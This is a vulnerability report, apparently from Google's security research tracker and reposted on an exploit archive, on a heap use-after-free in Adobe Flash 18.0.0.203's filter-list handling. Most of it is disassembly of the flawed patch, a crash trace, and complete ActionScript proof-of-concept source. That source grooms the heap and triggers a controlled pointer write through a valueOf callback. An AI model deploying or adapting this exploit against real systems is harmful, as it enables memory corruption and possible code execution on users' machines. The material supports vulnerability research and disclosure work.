Adobe Flash Heap Use-After-Free In SurfaceFilterList::C​reateFromScriptAtom Exploit

Source: https://code.google.com/p/google-security-research/issues/detail?id=484&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
 
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=508072]
 
VULNERABILITY DETAILS
Copy Paste of  Issue 480496 
 
VERSION
Chrome Version: N/A yet, Flash 18.0.0.203
Operating System: [Win7 x64 SP1]
 
REPRODUCTION CASE
 
Flash 18.0.0.203 patched  Issue 480496  by checking if the internal filter object is still alive after the first Array.length call (from Flash player standalone):
 
.text:004D71DA loc_4D71DA:
.text:004D71DA                 and     ecx, 0FFFFFFF8h
.text:004D71DD                 call    xAS2_getArrayLength
.text:004D71E2                 test    eax, eax
.text:004D71E4                 jle     short loc_4D725D
.text:004D71E6                 mov     ecx, [esp+8+arg_C]
.text:004D71EA                 mov     eax, [ecx+94h]
.text:004D71F0                 test    eax, 0FFFFFFFEh
.text:004D71F5                 jz      short loc_4D7200
.text:004D71F7                 and     eax, 0FFFFFFFEh
.text:004D71FA                 cmp     dword ptr [eax+28h], 0       ; here we check whether the object has been deleted or not
.text:004D71FE                 jnz     short loc_4D720B
.text:004D7200
.text:004D7200 loc_4D7200:
.text:004D7200                 mov     ecx, dword_E51A40
.text:004D7206                 call    sub_968A00                   ; and in that case we suicide
 
 
Unfortunately they forget to do that check after the second Array.length call:
 
.text:004D721D loc_4D721D:
.text:004D721D                 and     eax, 0FFFFFFF8h
.text:004D7220                 push    edi
.text:004D7221                 mov     edi, eax
.text:004D7223                 mov     ecx, edi
.text:004D7225                 xor     esi, esi
.text:004D7227                 call    xAS2_getArrayLength       ; here we can still execute a script and delete the filters...
.text:004D722C                 test    eax, eax
.text:004D722E                 jle     short loc_4D725C
 
Should crash that way:
CPU Disasm
Address   Hex dump          Command                                  Comments
004CE27F    8B51 04         MOV EDX,DWORD PTR DS:[ECX+4]
004CE282    8942 04         MOV DWORD PTR DS:[EDX+4],EAX         ; write a pointer to 0x41424344
004CE285    8B51 04         MOV EDX,DWORD PTR DS:[ECX+4]
004CE288    8950 08         MOV DWORD PTR DS:[EAX+8],EDX
004CE28B    FF41 08         INC DWORD PTR DS:[ECX+8]
004CE28E    8941 04         MOV DWORD PTR DS:[ECX+4],EAX
004CE291    C2 0400         RETN 4
004CE294    FF41 08         INC DWORD PTR DS:[ECX+8]
 
 
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "4"
//It's because Flash CS5.5 does not allow naming a property with a numeral
 
import flash.filters.GlowFilter;
 
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
    a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41424344
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
    var tf:TextFormat = new TextFormat()
    a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
    a1[i].tabStops = a2
}
    a1[0xFF].tabStops = []
 
function f() {
 
    _global.mc.createTextField("tf",1,1,2,3,4)
 
a1[0xFE].tabStops = []
a1[0xFD].tabStops = []
for (var i = 0x100; i<0x200;i++) {
        _global.a1[i].tabStops = _global.a2
    }
}
 
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
 
var oCounter:Object = new Object()
oCounter.valueOf = function () {
    _global.counter += 1
    if (_global.counter == 4) f()
    return 10;
}
 
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o;

#  0day.today [2018-01-08]  #